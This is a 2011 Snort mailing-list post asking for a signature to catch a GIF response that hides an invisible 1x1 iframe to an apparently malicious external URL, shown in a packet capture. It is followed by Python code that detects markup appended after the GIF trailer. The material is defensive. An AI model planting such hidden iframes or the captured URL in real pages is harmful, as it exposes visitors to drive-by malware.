Snort mailing list archives

iFrame's in gifs


From: "Lay, James" <james.lay () wincofoods com>
Date: Fri, 24 Jun 2011 16:10:05 -0600

Hey all!

Anyone got any leads on this or a sig for this?  Excitement below. I
have full pcap as well as the original image if anyone wants 'em.

James

Sanitized headers

GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif



GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
style='visibility: hidden;'></iframe>
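
One way to check an image body for the condition in the capture above (markup following the GIF trailer byte), as an added example that is not part of the original post. The function names and both sample byte strings are constructed for illustration, and example.invalid is a placeholder URL.

```python
import re

# Markup that has no business following GIF image data.
HTML_MARKERS = re.compile(rb"<\s*(iframe|script|object|embed)\b", re.IGNORECASE)

def _skip_sub_blocks(data, pos):
    """Walk length-prefixed sub-blocks; return the offset past the 0x00 terminator."""
    while data[pos] != 0:
        pos += 1 + data[pos]
    return pos + 1

def gif_trailing_data(data):
    """Return the bytes after the GIF trailer (0x3B), or None if the GIF does not parse."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    pos = 13                                  # header (6) + logical screen descriptor (7)
    if data[10] & 0x80:                       # global color table present
        pos += 3 * (2 << (data[10] & 0x07))
    try:
        while True:
            block = data[pos]
            if block == 0x3B:                 # trailer: the image ends here
                return data[pos + 1:]
            if block == 0x21:                 # extension: introducer, label, sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
            elif block == 0x2C:               # image descriptor, 10 bytes
                flags = data[pos + 9]
                pos += 10
                if flags & 0x80:              # local color table present
                    pos += 3 * (2 << (flags & 0x07))
                pos = _skip_sub_blocks(data, pos + 1)   # +1 skips LZW minimum code size
            else:
                return None                   # unknown block type
    except IndexError:
        return None                           # truncated file

def inspect_gif(data):
    """Classify a response body that claims to be a GIF."""
    trailing = gif_trailing_data(data)
    if trailing is None:
        return "not-a-valid-gif"
    if HTML_MARKERS.search(trailing):
        return "html-after-trailer"
    return "trailing-data" if trailing else "clean"

# Constructed samples: a 1x1 GIF87a, and the same file with an iframe appended.
CLEAN_GIF = bytes.fromhex("474946383761" "01000100800000" "ffffff000000"
                          "2c000000000100010000" "0202440100" "3b")
TAMPERED_GIF = CLEAN_GIF + b"<iframe src='http://example.invalid/' width='1' height='1'></iframe>"
```

The parser walks the block structure instead of searching for the first 0x3B, because that byte value can also occur inside color tables and compressed pixel data.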
